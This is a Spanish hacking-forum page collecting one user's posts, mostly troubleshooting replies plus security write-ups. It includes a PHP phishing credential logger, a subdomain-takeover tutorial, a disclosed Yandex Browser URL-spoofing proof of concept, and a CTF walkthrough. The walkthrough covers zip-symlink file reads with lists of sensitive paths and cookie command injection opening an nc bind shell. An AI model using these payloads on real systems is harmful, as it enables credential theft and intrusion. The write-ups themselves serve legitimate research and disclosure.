Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Jimeno

#1
Código: php

<?php
//error_reporting(0);
$usuario = "xd";
$password = "lmao";
$ip = "127.0.0.1";
         
if( ( empty($usuario)) || (empty($password)) ){
    header('Location: index.htm');
} else {
    //guarderemos en un archivo de texto
    $file = fopen('clave.txt','a+');
    fwrite($file, "usuario: ".$usuario."\ncontraseña: ".$password."\nIP: ".$ip."\n=========================\n");
    fclose($file);
    //echo("usuario: ".$usuario."\r\ncontraseña: ".$password."\r\nIP: ".$ip."\r\n=========================\r\n");
    header('Location: https://facebook.com/');     
}



Un saludo.
#2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola Jimeno, no se que quieres decir con ese de que no reinventes la rueda, no estoy inventando nada, creo que ya lo he comentado... no tengo ni idea de programación, así que poco puedo reinventar, solo he seguido como ya he dicho un toturial donde ponen el codigo y lo que intento es hacerle funcionar con las paginas que yo tengo y que no tiene menu, lo unico que quiero es ponerle ese menu, ni mas ni menos, pero cuando cargo una pagina el menu desaparece.

Gracias por ese link, pero mi ingles es nulo, aunque puedo ver los ejemplos, es mas o menos como lo que yo intento hacer.


Salu2.

El link lo único que contiene es un paquete que hace exactamente lo que tú pides. Un menú centralizado para todas tus páginas. Ayúdate del traductor de Google y ve poco a poco. Espero que te sirva.
Con lo de la rueda me refiero a que no crees tú el menú desde 0 o siguiendo una guia. Si tu objetivo es tenerlo, no implementarlo, es mejor que cojas uno ya hecho y funcional y simplemente lo metas en tu web.
#3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No hay nadie mas que pueda dar con la solución ?


Salu2.

No reinventes la rueda: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
Dudas y pedidos generales / Re:Ramsonware cryptxxx
Diciembre 21, 2016, 09:28:54 AM
RannohDecryptor de Kaspersky debería servirte para eliminarlo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sigue los pasos de su guía oficial al pie de la letra: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Buenas.

Aquí tienes una guía bastante útil y completa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
Dudas y pedidos generales / Re:Error rdesktop
Diciembre 18, 2016, 12:50:26 PM
Intenta conectarte sin SSL si es para pruebas en casa o instala Kerberos.
Por los foros dicen esto:
Citar> Yes you are able to login, rdekstop tries to connect using
> CredSSP+Kerberos for highest security, if kerberos is not initialized
> it will fallback to use SSL.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

O directamente baja la última versión de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y prueba. Este issue representa el mismo problema que tú tienes: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#7
Dudas y pedidos generales / Re:Error getgui
Diciembre 18, 2016, 12:05:37 PM
Aquí hay una guía en la que se encuentran con el mismo error que tú y explican cómo solucionarlo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Prueba con los pasos de la guía oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El error que has obtenido dice lo siguiente:
ERROR_NONE_MAPPED
    1332 (0x534)
    No mapping between account names and security IDs was done.

Saludos.
#8
Dudas y pedidos generales / Re:Kali cambio mac automático
Diciembre 04, 2016, 11:17:30 AM
Echa un ojo a esta guía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Muchas gracias, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fue un gran trabajo tanto del equipo como de la gente de INCIBE y demás.
PD: la imagen está mal, la victoria en la parte técnica fue algo mayor ;) Aquí tenéis el marcador final de esa parte:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#10
Nope.
Siempre y cuando tengan Bug Bounty y sigas las reglas puedes reportar sin ningún riesgo. Y además es una buena fuente de ingresos :)

En cuanto a las webs que no tienen VRP, en mi opinión es mejor no reportar ya que has realizado una intrusión no autorizada y, obviamente, es ilegal.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo creo que siempre hay que quedarse en el anonimato, si reportas la vulnerabilidad nunca dejar nuestros datos, ya sea nombre o correo electrónico personal, y siempre hacerlo detrás de proxy.

Si te lo quieren agradecer ya puedes tener otro tipo de contacto con ellos, pero pienso que mejor nunca revelar nuestra identidad, por si acaso.

Saludos
#11
Dudas y pedidos generales / Re:Arbol b+
Septiembre 26, 2016, 08:42:57 PM
Tan fácil como hacer una búsqueda en Google....
Aquí tienes el código en C++ y Java --> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Dudas y pedidos generales / Re:ARP Spoof
Septiembre 25, 2016, 09:26:38 PM
La tabla ARP no es permanente, sus valores se actualizan. Echa un vistazo a esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13
Off Topic / Re:El reto de la imresora
Septiembre 23, 2016, 11:34:38 AM
Buen plan para stalkear a tu vecina, el señor juez te manda saludos (:
#14
Buenas.

La razón no es realmente técnica, es que aumentan la complejidad del flujo de control de tu código y es mucho más difícil de comprender lo que hace a la hora de leerlo. Echa un ojo a este hilo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Un saludo.
#15
Bugs y Exploits / Re:Cómo tomé el control de tu subdominio
Septiembre 13, 2016, 02:58:55 AM
Buenas.

Dispones de muchas herramientas y métodos. Personalmente yo utilizo Gobuster, Google dorks, DNSdumpster y subbrute, pero hay muchas otras.

Si buscas rápidamente en google "encontrar subdominios"  o "subdomain enumeration" te aparecerán muchos artículos interesantes sobre distintos métodos para hacerlo.

Un saludo.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola buenas tardes
como detectas los subdominios de la web es lo que no entendí, disculpen mi ignorancia
#16
Bugs y Exploits / Cómo tomé el control de tu subdominio
Septiembre 12, 2016, 02:23:15 PM
Buenas a todos.

Me gustaría presentaros una técnica para tomar el control de ciertos dominios/subdominios de empresas. Es relativamente antigua, pero creo no haberla visto en blogs de habla hispana (no me echéis a los leones si me equivoco).

Como todos sabéis, la base para encontrar vulnerabilidades es la ENUMERACIÓN. Gracias a ella ampliamos exponencialmente nuestra superficie de ataque. Hay muchísimas herramientas para encontrar subdominios, es algo más que cubierto en los blogs de seguridad informática.

El nombre de la técnica es Subdomain Takeover o Toma de control de subdominio

Una vez elegido el dominio al que atacar (siempre teniendo permiso, por supuesto) podemos encontrarnos con que apunta a instancias de Heroku, Github, Amazon AWS, Sendgrid, etc. Es aquí cuando comienza nuestro ataque.
Hay empresas que crean instancias en dichos servicios y apuntan un subdominio hacia ellas. Tras un tiempo pueden eliminar dichas instancias, pero si se olvidan de eliminar el subdominio o hacer que no apunte hacia ellas podremos tomar el control del mismo.

En este caso en concreto la situación es la siguiente:

  • La empresa crea una instancia de almacenamiento (S3) en Amazon AWS
  • Apuntan su subdominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hacia dicha instancia
  • Tras un tiempo eliminan la instancia PERO SE OLVIDAN DE CAMBIAR EL SUBDOMINIO

(en las imágenes se muestra cómo el subdominio sigue apuntando hacia la instancia ya eliminada)




Gracias a ello nosotros podemos hacer que dicho subdominio apunte hacia una instancia nuestra. En ella podemos almacenar simplemente algo para vacilar, spam de una empresa competidora, un phising... las opciones son muchas y cada cual más jugosa.

En el caso de AWS lo que deberemos hacer es conectarnos a nuestra cuenta (mejor a una anónima si no lo hacéis con permiso) y crear una nueva instancia con el nombre del subdominio (la parte de la izquierda en ANSWER SECTION en la imagen anterior, en mi caso No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, es decir, todo lo anterior a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta).

Tras crear la instancia subiremos nuestro archivo (en mi caso un index.html en el que había <h1>pwned</h1>) a la misma y lo marcaremos como público.

(en la imagen se aprecia el resultado)


El resultado es que el subdominio apunta a nuestra instancia y tenemos control total del mismo:

(imagen)




Espero que os sirva de utilidad el post.


Más información y los primeros posts que leí sobre esta técnica:
#17
Buenas a todos.

Supongo que esteréis familiarizados ya con esta vulnerabilidad. En caso de que no lo estéis, se trata de conseguir que el navegador muestre una URL legítima (por ejemplo el login de Gmail) pero que realmente el usuario esté visitando el servidor del atacante o uno fraudulento.
Se puede aprovechar para muchos objetivos, a mí el principal que se me ocurre es mostrar un panel de login clonando el login de la página víctima. La víctima verá la URL legítima, pero realmente estará entregando sus credenciales al atacante.

Comenzamos por el navegador de Yandex (empresa que tiene Bug Bounty):

CitarEn el caso de Yandex ambas vulnerabilidades fueron reportadas y consideradas como duplicadas, es decir, otro investigador las ha reportado antes que yo. Si eres esa persona y deseas que elimine este post, contacta conmigo a través de Twitter y lo haré inmediatamente (@migueljimeno96).

Yandex Browser para Windows
(reporte enviado el 19 de Julio de 2016, 21:36)

Los pasos a seguir para falsificar la URL una vez el usuario visita la página fraudulenta son los siguientes:

  • Una vez la página ha cargado, se llama a una función de JS (en mi caso se llama a dicha función al pulsar un botón).
  • La función abre una nueva ventana utilizando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Dicha ventana cargará la URL que deseamos falsificar.
  • Utilizaremos entonces document.write sobre dicha ventana para colocar nuestro contenido fraudulento (panel de login por ejemplo).

De forma que el código será el siguiente:
Código: html5

<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
The page is being hosted in my server


De tal forma que al pulsar sobre el botón en el navegador ocurría lo siguiente:




Tras intercambiar unos cuantos correos con el equipo de seguridad de Yandex la respuesta final fue la siguiente:


CitarHello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!

Vasiliy Kuznetsov Yandex Security Team


Yandex Browser para Android
(reporte enviado el 19 de Julio de 2016, 18:41)

Los pasos a seguir fueron los mismos, de forma que la víctima veía lo siguiente:



Tras unos pocos días recibí los siguientes correos del equipo de seguridad:

Citar
Hello, Miguel Angel!
As for Android, I'll check it shortly because it look similar to one report we got the other day. I'll let you know in a few days.
Have a great weekend!

Citar
Hello, Miguel Angel!
I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

Enlace al writeup original: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos y espero que os haya gustado!
#18
También puedes probar a crear tu propio blog y hostearlo en Github
#19
Por lo que leo se debe a que no tienes RVM instalado. Te dejo estos dos links que deberían solucionar tu problema:

Un saludo y suerte, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
#20
Enhorabuena @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, tú y JKS conseguisteis esa, la solución esperada. Hiciste un gran trabajo :)

Espero sacar más retos pronto

Un saludo y gracias por participar.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo no resolvi la primer parte, lei el post que explicaba como leer archivos y jugue a conseguir ejecucion de codigo

Primero me hice un script para tratar de conseguir mas información. El objetivo era conseguir archivos de configuracion, principalmente para sacar el path del php que maneja las subidas. Mi idea era por un lado, leer el codigo para ver como funcionaba, y por el otro ver si se podia hacer que los archivos descompriman en la carpeta de la web y subir una shell.


Código: php
<?PHP
$a = file_get_contents("httpd-conf-locations.txt");

$i=300;
foreach(explode("\n", $a) as $line){
    system('ln -s "'.$line.'" prueba'.$i++);
}


El txt es este:
Código: php
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/var/www/conf/httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/conf.d/apache2
/opt/lampp/etc/httpd.conf

Despues:
Código: php
zip --symlinks prueba1.zip prueba*

Ahi me aparecio el archivo de configuracion de apache y saque que la carpeta es /var/www
Ya me habia imaginado que era esa la carpeta, pero buscaba el archivo en /var/www/index.php

Volvi a correr el script con otro txt:
Código: php
/apache/logs/access.log
/apache/logs/error.log
/apache2/logs/access.log
/apache2/logs/error.log
/bin/php.ini
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/cgi-bin
/etc/chrootUsers
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/my.cnf
/etc/mysql/my.cnf
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/shadow
/etc/utmp
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/access.log
/logs/error.log
/logs/pure-ftpd.log
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/root/.Xauthority
/root/.bash_history
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/log
/var/apache/logs
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/access_log
/var/log/access_log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/error.log
/var/log/error_log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/log/access_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/error_log
/web/conf/php.ini
/www/logs/proftpd.system.log
c:\NetServer\bin\stable\apache\php.ini
c:\PHP\php.ini
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\apache\logs\access.log
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\error.log
c:\apache\php\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\php4\php.ini
c:\php5\php.ini
c:\php\php.ini
c:\xampp\apache\bin\php.ini

Ahi vi algunos archivos mas y me di cuenta de que era un ubuntu. Tambien me di cuenta de que no habia ninguna configuracion loca, el archivo php.ini estaba como cualquier otro, habian pocos usuarios, el usuario del webserver era www-data y cosas asi. Pregunté y me dijeron que en ubuntu tenia que buscar en /var/www/html/index.php

Ahi consegui el source:
Código: php
ln -s "/var/www/html/index.php" prueba54
zip --symlinks prueba1.zip prueba54


Código: php
<!DOCTYPE html5>
<head>
    <meta charset="utf-8"/>
    <title>Sube tu archivo aquí</title>
</head>

<body>
    <form action="?page=upload" method="post" enctype="multipart/form-data">
        <input type="file" name="file"/>
        <input type="submit" value="kuankear!"/>
    </form>


<?php
    session_start();
    $allowed = array('zip');
    $filename = $_FILES['file']['name'];
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    if (!in_array($ext, $allowed)) {
        die("La extensión del archivo no es admisible.");
    }
    $tmp_file = "/tmp/" . session_id();
    $zip = new ZipArchive;
    $zip->open($_FILES['file']['name']);
    $zip->extractTo($tmp_file);
    exec('unzip -o ' . $_FILES['file']['tmp_name'] . ' -d ' . $tmp_file);
    echo "Contenido del ZIP:<br>";
    passthru("cat $tmp_file/* 2>&1");
    exec("rm -rf $tmp_file");
   
?>


</body>
</html>


Ahi me di cuenta de algo que podria haber visto mucho antes: cuando tiraba errores tipo "cat: /tmp/asdasdasdasdqwe: No such file or directory", el nombre del archivo venia del id de sesion (la cookie PHPSESSID)

La parte importante:
Código: php

    session_start();
    $tmp_file = "/tmp/" . session_id();
    passthru("cat $tmp_file/* 2>&1");


Con exec() tambien se ejecutan los comandos, pero con passthru() vemos la salida
Seteo la cookie a esto:
Citar0g4clkinm90tfeukeferus7en0asd$(id)
Y entre un monton de errores se ve esto:

Código: php
Contenido del ZIP:<br>cat: /tmp/0g4clkinm90tfeukeferus7en0asduid=33(http): Is a directory
cat: gid=33(http): No such file or directory
cat: groups=33(http)/*: No such file or directory


Trate de correr nc y wget pero no podia porque si ponia un espacio en la cookie, php generaba otra
Use esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me quedó esta cookie:
Código: php
qur0v0rjnj840jju8qn1qpdjd3q$({nc,-lp,8989,-e,/bin/bash})

Y ahi me pude conectar a una shell remota

A partir de la parte donde consigo el codigo php, todas las pruebas son locales porque desaparecio el servidor. Es probable que en el servidor no me pueda conectar asi, pero sirve la misma tecnica para hacer una conexion inversa o para bajar una webshell con wget


Me diverti bastante, me gustó que no haya que adivinar cosas